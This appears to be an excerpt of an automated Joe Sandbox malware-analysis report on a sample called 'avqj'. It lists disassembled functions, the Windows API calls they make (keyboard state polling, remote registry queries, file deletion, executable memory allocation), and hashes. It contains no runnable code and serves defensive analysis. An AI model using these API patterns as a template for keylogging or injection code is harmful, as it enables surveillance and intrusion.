                                              • Instruction ID: 7a5361c2d55a8f99584edc86b65112c7e0c9e5f3f194cc376a8c716952429600
                                              • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                              • Instruction Fuzzy Hash: D4F0F87240020DFFDF05DF94C941E9EBBB9FB18318F209449F9199A251D336EA61EBA1
                                              Function 00E84154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID:
                                              • API String ID: 176396367-0
                                              • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                              • Instruction ID: e7d071528444458c9c4a04aa9ec9b617b2b806ce09207d47a971fd400318edf0
                                              • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                              • Instruction Fuzzy Hash: D7D05EA334201025B669213D2D4BD7F859CCBC77A0B04143EFA06DE1E5E8845C0200A0
                                              Function 00EEE783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EEE7A2
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: NamePathShort_wcslen
                                              • String ID:
                                              • API String ID: 2021730007-0
                                              • Opcode ID: dc2f790c6c982452cb082bb39d9a9cf5306c67bdd78f33e1b38364e83c9ecb49
                                              • Instruction ID: 81ab5461480d2aa595be6f05d00cb7f9495674605f734a70fe95a9a4c108861e
                                              • Opcode Fuzzy Hash: dc2f790c6c982452cb082bb39d9a9cf5306c67bdd78f33e1b38364e83c9ecb49
                                              • Instruction Fuzzy Hash: 67E0CD7260023457C710A2989C05FDA77EDDFC8790F054074FD09E7258DD64DD808690
                                              Function 00E9F13C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,00E8B0DE,?,?,00000000,?,00E86B73,?), ref: 00E9F156
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 846fceca84d8a28c5bd1a81341d87f555e446506250b1a22414586d69cf8f7d1
                                              • Instruction ID: 25f07b5a3f05f49c5fe54961849d7c744765525cc54eab900463378346b6b5e3
                                              • Opcode Fuzzy Hash: 846fceca84d8a28c5bd1a81341d87f555e446506250b1a22414586d69cf8f7d1
                                              • Instruction Fuzzy Hash: 38E092B5510704BFE728DF55D84AD97BBF8EB08310B00455EA85693740E7B1BD448B50
                                              Function 00E839DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E839FD
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: LongNamePath_wcslen
                                              • String ID:
                                              • API String ID: 541455249-0
                                              • Opcode ID: 58797dffebc3aa16ca0d112e4a902f61a34c2328330d0b218cb9d8905e662496
                                              • Instruction ID: 54b47f719a077490f3889882e4f124a725cf7f8b06784ae44795127f2eb28467
                                              • Opcode Fuzzy Hash: 58797dffebc3aa16ca0d112e4a902f61a34c2328330d0b218cb9d8905e662496
                                              • Instruction Fuzzy Hash: A8E0C272A002285BCB20A2989C06FEAB7EDDFC8790F0540B5FD09E7258DDB4ED809690
                                              Function 00EEE753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00EEE76C
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FolderPath_wcslen
                                              • String ID:
                                              • API String ID: 2987691875-0
                                              • Opcode ID: 5f066cf6eaecb62a9760491278b4226446394682ab1eedd08722c2d237f7d742
                                              • Instruction ID: f3f89065eea1a56a44ccf28367ddb2a0de3c95a73bdea5d4f7395492ff6e185e
                                              • Opcode Fuzzy Hash: 5f066cf6eaecb62a9760491278b4226446394682ab1eedd08722c2d237f7d742
                                              • Instruction Fuzzy Hash: 1ED05EA29002282BDF60E6B49D0DDF73AACC740250F0046A17C6DD3142E934ED4486A0
                                              Function 00EEDA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                              Download Yara Rule
                                              APIs
                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00EED9DC,?,?), ref: 00EEDA72
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: e4a2782cae0bf11807f6737d54ca11facf5dcc3494c99d8f4a700fc37a85c60b
                                              • Instruction ID: 2662c0b211a3c094d5b52bf68fa752a23a4b75a1b9b98f011bb5340c5e419270
                                              • Opcode Fuzzy Hash: e4a2782cae0bf11807f6737d54ca11facf5dcc3494c99d8f4a700fc37a85c60b
                                              • Instruction Fuzzy Hash: 4AD0C7305D020DBBEF509B51CD07F99B77CE711B45F104194B101EA0D0D7B5A519A765
                                              Function 00EC073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00EC0AA4,?,?,00000000,?,00EC0AA4,00000000,0000000C), ref: 00EC0757
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2b95f24d771df0a269b408b6d5178c4935b8070619d57caaceea450f76edd9e3
                                              • Instruction ID: 0e0c6c12ed28a3ad5d5924ae5743017a1a3c99fdc8fd3cb9fc7f2dcbf5b0aa35
                                              • Opcode Fuzzy Hash: 2b95f24d771df0a269b408b6d5178c4935b8070619d57caaceea450f76edd9e3
                                              • Instruction Fuzzy Hash: A1D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1866020C732E821AB90
                                              Function 00EEE9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 7833e61004bc6c0aeb3dfc3d0e4b91770b01f9ebcbad556705fbd816f7ee389f
                                              • Instruction ID: dbc1286eafa2d80dd6c285c8a89514e284887e8c0ab0997d06babfd02fa19736
                                              • Opcode Fuzzy Hash: 7833e61004bc6c0aeb3dfc3d0e4b91770b01f9ebcbad556705fbd816f7ee389f
                                              • Instruction Fuzzy Hash: 7CB092240006A805BD790A391A080A9339068C33AA7D82BD5E4B9A52E3C33F880BE610
                                              Function 00EF6561 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00EEDB69: FindFirstFileW.KERNELBASE(?,?), ref: 00EEDBE0
                                                • Part of subcall function 00EEDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00EEDC30
                                                • Part of subcall function 00EEDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEDC41
                                                • Part of subcall function 00EEDB69: FindClose.KERNEL32(00000000), ref: 00EEDC58
                                              • GetLastError.KERNEL32 ref: 00EF6583
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2191629493-0
                                              • Opcode ID: da0e1483a42ea4590e42fe332858fec2473a645d4b7f1a525d67dc039a7535b4
                                              • Instruction ID: 238d10b16f6d3feafd0d01bb901fdca662e27b6879a03c606c05b79bd34d7bc8
                                              • Opcode Fuzzy Hash: da0e1483a42ea4590e42fe332858fec2473a645d4b7f1a525d67dc039a7535b4
                                              • Instruction Fuzzy Hash: BAF08C322002049FCB14FF59D844B6AB7E5AF48360F058449F95EAB352CB70FC018B95
                                              Function 00E87953 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,00000000,00EC3A1C), ref: 00E87973
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 0cbbe8ab5fefe93b501f7c4a88244fdb59a8dccf1e12c70570a7067715faf181
                                              • Instruction ID: fd990ffc3963336199a2d7c98f66d98f51bbcf60bc8328f905471be27fdda5ad
                                              • Opcode Fuzzy Hash: 0cbbe8ab5fefe93b501f7c4a88244fdb59a8dccf1e12c70570a7067715faf181
                                              • Instruction Fuzzy Hash: DBE0B675408B12CFD3315F1AE804452FBF8FFD23613324A2ED0E992660D3B09886DB50
                                              Function 012AAF58 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A
                                              Function 012AAF58 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 0121A000, based on PE: false
                                              • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A
                                              Function 012AAF58 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A9000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A
                                              Function 012AAF58 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                              • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A

                                              Non-executed Functions

                                              Function 00EFA0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00EFA11B
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00EFA176
                                              • FindClose.KERNEL32(00000000), ref: 00EFA181
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00EFA19D
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EFA1ED
                                              • SetCurrentDirectoryW.KERNEL32(00F47B94), ref: 00EFA20B
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EFA215
                                              • FindClose.KERNEL32(00000000), ref: 00EFA222
                                              • FindClose.KERNEL32(00000000), ref: 00EFA232
                                                • Part of subcall function 00EEE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EEE2C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 2640511053-438819550
                                              • Opcode ID: 4dc2b5647b2bf50de71255d007b2936c64db93002f8e7188639fcfa64ce32992
                                              • Instruction ID: 69ee9e013d341508f0372828400a4f49cf76f481b429bcce3dc2a6dcf852ee7e
                                              • Opcode Fuzzy Hash: 4dc2b5647b2bf50de71255d007b2936c64db93002f8e7188639fcfa64ce32992
                                              • Instruction Fuzzy Hash: 463148B260131D6ADB10AFA4EC08AEE77BCDF45324F145161F918F70E0DB71DA84DA52
                                              Function 00F0C7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00F0D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0C00D,?,?), ref: 00F0D314
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D350
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3C7
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3FD
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0C89D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F0C908
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0C92C
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F0C98B
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F0CA46
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F0CAB3
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F0CB48
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F0CB99
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F0CC42
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F0CCE1
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0CCEE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                              • String ID:
                                              • API String ID: 3102970594-0
                                              • Opcode ID: f52e9399646ba65e188a3af7a49128dd0a729cd09366f106747fca765c290858
                                              • Instruction ID: 81728084f19e460e28e8913f5298e8bcafd92a9444ba96780127e4455e8dedf5
                                              • Opcode Fuzzy Hash: f52e9399646ba65e188a3af7a49128dd0a729cd09366f106747fca765c290858
                                              • Instruction Fuzzy Hash: 00027F716042409FD714DF24C895E2ABBE5EF48314F18C59DF84ADB2A2DB31ED42EB91
                                              Function 00EEA54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00EEA572
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00EEA5F3
                                              • GetKeyState.USER32(000000A0), ref: 00EEA60E
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00EEA628
                                              • GetKeyState.USER32(000000A1), ref: 00EEA63D
                                              • GetAsyncKeyState.USER32(00000011), ref: 00EEA655
                                              • GetKeyState.USER32(00000011), ref: 00EEA667
                                              • GetAsyncKeyState.USER32(00000012), ref: 00EEA67F
                                              • GetKeyState.USER32(00000012), ref: 00EEA691
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00EEA6A9
                                              • GetKeyState.USER32(0000005B), ref: 00EEA6BB
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 978df729b3342989cd7f9266a82466d6cb49ffd00127ee7f7dc0e81cd70c49ab
                                              • Instruction ID: dbee431fb4bf1963bbc02a0bc88117fac7748cda354bd1f7ade8383c703d4473
                                              • Opcode Fuzzy Hash: 978df729b3342989cd7f9266a82466d6cb49ffd00127ee7f7dc0e81cd70c49ab
                                              • Instruction Fuzzy Hash: 7A4195745047CE6EFF319B6188143A5BEA16F12348F0C906DD5C66A1C2EB94ADC8CB63
                                              Function 00F04089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32 ref: 00F040D1
                                              • CoUninitialize.OLE32 ref: 00F040DC
